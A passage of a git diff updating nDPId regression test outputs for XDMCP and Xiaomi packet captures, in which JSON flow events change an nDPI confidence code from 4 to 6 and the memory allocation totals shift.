00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1538467333586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1538467333586,"pkt":"UlQAEjUACAAngNsFCABFAAA5uT5AAEARaW4KAQIECgECAgCx7\/IAJRg+AAEABQAXAAAAAAARV2lsbGluZyB0byBtYW5hZ2U="} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1538467333586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1538467333586,"pkt":"CAAngNsFUlQAEjUACABFAADZIEMAAP8RgskKAQICCgECBO\/yALEAxWSsAAEABwC3AAAJAAAAAAAAAAAAAAAGAAYABgAGCQAExlrfKwAEwKg4AQAEqf5aAAAEqf5VYAAExj1eOQAQ\/oAAAAAAAAAUuwoXMyj2JAAQ\/oAAAAAAAAAND9alvNJ9SwAQ\/oAAAAAAAAClDBBzRudaAAAQ\/oAAAAAAAAChc6eH9dJVYAAAAAADABJNSVQtTUFHSUMtQ09PS0lFLTEAE1hETS1BVVRIT1JJWkFUSU9OLTEACVNVTi1ERVMtMQAA"} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1538467333581,"flow_last_seen":1538467336601,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1538467336601,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"XDMCP","breed":"Acceptable","category":"RemoteAccess"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1538467333581,"flow_last_seen":1538467336601,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1538467336601,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"XDMCP","breed":"Acceptable","category":"RemoteAccess"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"xdmcp.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":335,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1538467336601} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869617 bytes -~~ total memory freed........: 5869617 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6003251 bytes +~~ total memory freed........: 6003251 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 694 chars diff --git a/test/results/xiaomi.pcap.out b/test/results/xiaomi.pcap.out index d5ce5523b..5a7cad70b 100644 --- a/test/results/xiaomi.pcap.out +++ b/test/results/xiaomi.pcap.out @@ -2,48 +2,48 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639054136437} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1639054136437,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":136,"pkt_l4_len":98,"thread_ts_msec":1639054136437,"pkt":"AAAAAAAAAAIAAAAIgQAA0AgARRQAdj14QAAuBjXZL\/EHWAo0l6AUZpkMYD5IiLldMd2AGAA1w4IAAAEBCAqKynYNev32UML+AAUAAAA2AAIAFgAAABgIABoKeGlhb21pLmNvbSoEQ09OTkgACgo1Mzg2MzcwNzY5EgQ3ZjA0GgIIACIAfagLdw=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1639054136437,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1639054136437,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":2,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":66,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":6,"global_ts_msec":1643625846975} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643625846975,"flow_last_seen":1643625846975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643625846975,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643625846975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643625846975,"pkt":"AAAAAAAAAA0AYH2pCABFFAA8AABAAC4G2JdzpErowKj02xRms1CUmJB5c0FIJ6ASaVAVsQAAAgQFUAQCCAri0mMlEWpVrAEDAwk="} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643625847008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1643625847008,"pkt":"AAAAAAAAAAoAtbdgCABFAADsPqBAAEAGh1vAqPTbc6RK6LNQFGZzQUgnlJiQeoAYAKxOqAAAAQEIChFqVg7i0mMlwv4ABQAAAKwAAgAWAAAAjggAGgp4aWFvbWkuY29tKgRDT05OSAAIahINUmVkbWkgTm90ZSA5UxoRVjEyLjUuMi4wLlJKV01JWE0iKmEtRDdBNUQ4QTlCNTM3NTI5Rjk2NkU0MjlEMDU4ODYyMDMyNEY2QzVFMigqMg9tb2JpbGUtbHRlLXRhaWY6ETQ3LjI0MS4zNS43Mzo1MjIyQhBhcl9FR18jdS1udS1sYXRuSgIYAFAebjssqA=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625846975,"flow_last_seen":1643625847008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1643625847008,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625846975,"flow_last_seen":1643625847008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1643625847008,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1643625847088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643625847088,"pkt":"AAAAAAAAAA0AYH2pCABFFAB28\/pAAC4G5GJzpErowKj02xRms1CUmJB6c0FI34AYADWHawAAAQEICuLSY5YRalYOwv4ABQAAADYAAgAWAAAAGAgAGgp4aWFvbWkuY29tKgRDT05OSAAKCjMyNjg2ODQ5MzMSBDQ1MzkaAggAIgB79gtJ"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643625848421,"flow_last_seen":1643625848421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643625848421,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643625848421,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643625848421,"pkt":"AAAAAAAAAAMAPY54CABFFAA8AABAAC8G1WVzpErowKj3DRRmlIK6\/lCi\/G71lqASaVAKjgAAAgQFUAQCCArZ9CR01bLjhQEDAwk="} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643625848472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1643625848472,"pkt":"AAAAAAAAAAEAxKEDCABFAADTHaZAAD8GpzzAqPcNc6RK6JSCFGb8bvWWuv5Qo4AYAIDreAAAAQEICtWy5AnZ9CR0wv4ABQAAAJMAAgAWAAAAdQgAGgp4aWFvbWkuY29tKgRDT05OSAAIahIKTTIwMTBKMTlTRxoRVjEyLjAuOS4wLlFKUU1JWE0iKmEtQzVERjdDOEVDQ0ZGMzE3OEY5Mjk0REJDNzA1NzhCRUZDQTU5QTgzQygqMgR3aWZpOhE0Ny4yNDEuMzUuNzM6NTIyMkIFYXJfRUdKAhgAUB2r3iMF"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625848421,"flow_last_seen":1643625848472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1643625848472,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625848421,"flow_last_seen":1643625848472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1643625848472,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643625848565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643625848565,"pkt":"AAAAAAAAAAMAPY54CABFFAB2dEZAAC8GYOVzpErowKj3DRRmlIK6\/lCj\/G72NYAYADVuFAAAAQEICtn0JQPVsuQJwv4ABQAAADYAAgAWAAAAGAgAGgp4aWFvbWkuY29tKgRDT05OSAAKCjg0NDQ0MzU3NjcSBDcwOTgaAggAIgB8CwtM"} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1643625848723,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1643625848723,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643625858130,"flow_last_seen":1643625858130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643625858130,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1643625858130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643625858130,"pkt":"AAAAAAAAAAUARa2GCABFFAA8AABAAC0GVvFhJ3eswKhdOxRmySBqbHLib20O5qASaVBi5QAAAgQFUAQCCAoVb3OrFqysdQEDAwk="} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1643625858163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1643625858163,"pkt":"AAAAAAAAAAUARa2GCABFAADeXtNAAEAG5I\/AqF07YSd3rMkgFGZvbQ7mamxy44AYAVdX7gAAAQEIChasrOMVb3Orwv4ABQAAAJ4AAgAWAAAAgAgAGgp4aWFvbWkuY29tKgRDT05OSAAIahIJTTIxMDFLN0JHGhJWMTIuNS4xNS4wLlJLTE1JWE0iKmEtQUM5NDFEMkFEQUQ4RkVDNEJGODYzMTRDQzhDNTE2Q0I3NkY2OTUyQSguMg9tb2JpbGUtbHRlLXRhaWY6ETQ3LjI0MS41OS44Nzo1MjIyQgVhcl9FR0oCGABQHn0CJwc="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625858130,"flow_last_seen":1643625858163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1643625858163,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625858130,"flow_last_seen":1643625858163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1643625858163,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1643625858251,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643625858251,"pkt":"AAAAAAAAAAUARa2GCABFFAB2BwBAAC0GT7dhJ3eswKhdOxRmySBqbHLjb20PkIAYADWSLgAAAQEIChVvdCQWrKzjwv4ABQAAADYAAgAWAAAAGAgAGgp4aWFvbWkuY29tKgRDT05OSAAKCjkyODQzNjUzNzESBGQzOGMaAggAIgB+7gui"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":19,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":18,"total-skipped-flows":0,"total-l4-payload-len":3907,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1649839944752} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649839944752,"flow_last_seen":1649839944752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1649839944752,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1649839944752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649839944752,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MLBAAD8GlDbAqAJkA3+wSpNMFGaY8mRiAAAAAKAC\/\/+SoQAAAgQFtAQCCAodPXxCAAAAAAEDAwk="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1649839944776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649839944776,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAAPMGEOYDf7BKwKgCZBRmk0xMrReHmPJkY6ASaN+IpwAAAgQFrAQCCAr78kDrHT18QgEDAwg="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1649839944780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1649839944780,"pkt":"eJS0JASgYDjgxTWgCABFAAA0MLFAAD8GlD3AqAJkA3+wSpNMFGaY8mRjTK0XiIAQAKwfgwAAAQEICh09fF\/78kDr"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1649839944752,"flow_last_seen":1649839944782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":225,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649839944782,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1643625846975,"flow_last_seen":1643625847231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":928,"flow_tot_l4_payload_len":1284,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1643625858130,"flow_last_seen":1643625858384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1643625848421,"flow_last_seen":1643625997739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":914,"flow_tot_l4_payload_len":1269,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1649839944752,"flow_last_seen":1649839944782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":225,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649839944782,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 